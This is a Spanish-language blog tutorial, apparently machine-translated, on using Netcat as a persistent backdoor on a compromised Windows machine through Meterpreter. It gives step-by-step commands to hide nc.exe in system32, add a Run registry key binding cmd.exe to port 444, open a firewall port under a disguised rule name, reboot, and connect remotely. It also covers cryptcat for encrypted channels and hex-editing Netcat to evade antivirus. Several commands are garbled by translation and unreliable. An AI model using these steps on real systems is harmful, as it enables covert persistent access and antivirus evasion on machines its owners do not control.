NetCat

Agentes persistentes Kali Linux NetCat

Agentes persistentes Kali Linux NetCat
En este artículo, repasaremos las cosas que puede hacer con una utilidad de red llamada Netcat, la navaja suiza de herramientas de red.

Introducción:

Netcat es una utilidad de red que puede leer y escribir en puertos UDP y TCP. A menudo se lo conoce como la navaja suiza de las herramientas de piratería porque puede hacer varias cosas tanto como cliente como como servidor durante las aventuras de piratería. A menudo lo usaremos para crear capas de enlace e inversión alrededor de los informes para ver qué está sucediendo y enviar archivos entre máquinas. Shell es una forma en la que puede interactuar con una computadora como un símbolo del sistema en Windows o una terminal en Linux. Netcat nos permite realizar muchas cosas como estantes invertidos, comunicarnos entre dos o más computadoras, y le permitirá realizar una gran cantidad de funciones. Netcat puede escanear puertos y conectarse a puertos abiertos usando sus simples argumentos de comando. También es capaz de enviar archivos y proporcionar administración remota a través de un shell directo o inverso.

Emplear Netcat como agente persistente:

Netcat es un programa extremadamente versátil y útil. He mencionado anteriormente en este artículo que se usa para comunicarse entre dos computadoras. También se puede utilizar si desea instalar persistencia. Netcat se puede utilizar como puerta trasera. Así que comencemos creando un shell persistente en el sistema comprometido usando Netcat. Usaremos -nc.exe, ya que es el nombre del ejecutable. Pero si le cambia el nombre antes de usarlo, se minimizan las posibilidades de detección. Sin embargo, incluso después de cambiar el nombre de un software antivirus, puede detectarlo. Muchos piratas informáticos alteran algunos de los elementos del código fuente de Netcat, que son innecesarios y, antes de usarlo, lo recompilan. Estos cambios harán que Netcat sea invisible para el software antivirus.

En Kali, Netcat se almacena en / usr / share / windows-binaries. Para cargarlo en el sistema comprometido, use el comando desde meterpreter:

$ meterpreter> cargar / usr / compartir / windows-binaries / nc.exe C: \\ WINDOWS \\ system32

Hay muchos tipos de archivos en esta carpeta, para ocultar un archivo en un sistema comprometido es el mejor lugar

También puede usar un protocolo de transferencia de archivos Trivial si no tiene una conexión de meterpreter para transferir el archivo.

El siguiente paso es configurar el registro para que pueda iniciar Netcat cuando se inicie el sistema y asegurarse de que esté escuchando en el puerto 444. Utilice el comando que se proporciona a continuación:

$ meterpreter> reg setval -k HKLM \\ software \\ microsoft \\ windows \\
versión actual \\ ejecutar -vv nc -d 'C: \\ windows \\ system32 \\ nc.exe -Ldp 444
-e cmd.exe'

Ahora que ha usado el comando mencionado anteriormente, use el siguiente comando queryval para asegurarse de que la implementación del cambio en el registro sea exitosa.

$ meterpreter> reg queryval -kHKLM \\ software \\ microsoft \\ windows \\
versión actual \\ ejecutar -vv nc

Abra un puerto en un firewall local para confirmar que el sistema comprometido aceptará conexiones remotas a Netcat mediante el comando $ netsh. Conocer el sistema operativo del objetivo es de suma importancia. El contexto de la línea de comandos utilizado para Windows Vista, Windows Server 2008, es

$ netsh advfirewall

Para sistemas anteriores, se usa el comando $ netsh firewall. Ingrese el comando de shell en el indicador de meterpreter para agregar el puerto al firewall local de Windows, ingrese la regla usando el comando adecuado. Para el correcto funcionamiento del sistema, nombre de usuario como 'svchostpassthrough' al nombrar la regla. A continuación, se muestra un comando de muestra:

$ C: \ Windows \ system32> netsh firewall agregar apertura de puerto
TCP 444 "paso a través del servicio"

Para confirmar que el cambio se implementó con éxito usando el siguiente comando:

$ C: \ windows \ system32> netsh firewall muestra la apertura del puerto

Después de la confirmación de la regla del puerto, asegúrese de que la opción de reinicio funcione.

Ingrese el siguiente comando desde el indicador de meterpreter:

$ meterpreter> reiniciar

Ingrese el siguiente comando desde un shell interactivo de Windows:

$ C: \ windows \ system32> apagar -r -t 00

Para acceder al sistema comprometido de forma remota, escriba $ nc en un símbolo del sistema, indique el nivel de detalle de la conexión (-v y -vv reportan información básica, mucha más información respectivamente), y luego ingrese la dirección IP del objetivo y el número de puerto.

$ nc -v 192.168.43.128 444

Desafortunadamente, Netcat tiene algunas limitaciones, que es que no hay autenticación de los datos transmitidos y el software antivirus puede detectarlos. Sin embargo, el problema de una menor encriptación se puede resolver utilizando cryptcat, que es una alternativa a Netcat. Durante la transmisión entre el host explotado y el atacante, protege los datos mediante el cifrado Twofish. No será incorrecto decir que proporciona una protección razonablemente sólida para los datos cifrados.

Asegúrese de que haya un oyente listo y configurado con una contraseña segura para usar cryptcat, use el siguiente comando:

$ sudo cryptcat -k contraseña -l -p 444

El siguiente paso es cargar cryptcat en el sistema comprometido y configurarlo para que se conecte con la dirección IP del oyente usando el siguiente comando:

$ C: \ cryptcat -k contraseña 444

Es lamentable decir que Netcat y sus variantes pueden ser detectados por software antivirus. Al usar un editor hexadecimal para alterar el código fuente de Netcat, existe la posibilidad de que Netcat no sea detectado. Pero es un largo proceso de prueba y error. Un enfoque más confiable es utilizar los mecanismos de persistencia de Metasploit Framework.

Conclusión:

NETCAT es una navaja suiza que se utiliza para piratería eficiente. Puede realizar varias funciones para acceder al servidor y al cliente. Este artículo le proporciona una breve descripción de la función y el uso de NETCAT. Espero que te haya gustado si este artículo te ha ayudado luego compártelo con tus amigos. No dude en preguntar sobre cualquier consulta que tenga sobre NETCAT. También puedes compartir tu opinión y más detalles.

Cómo cambiar los botones izquierdo y derecho del mouse en una PC con Windows 10
Es una norma que todos los dispositivos de mouse de computadora estén diseñados ergonómicamente para usuarios diestros. Pero hay dispositivos de mouse...
Emule los clics del mouse colocando el mouse con Clickless Mouse en Windows 10
El uso excesivo de un mouse o teclado en una postura incorrecta puede provocar muchos problemas de salud, como tensión, síndrome del túnel carpiano y ...
Agregue gestos del mouse a Windows 10 con estas herramientas gratuitas
En los últimos años, las computadoras y los sistemas operativos han evolucionado enormemente. Hubo un momento en que los usuarios tenían que usar coma...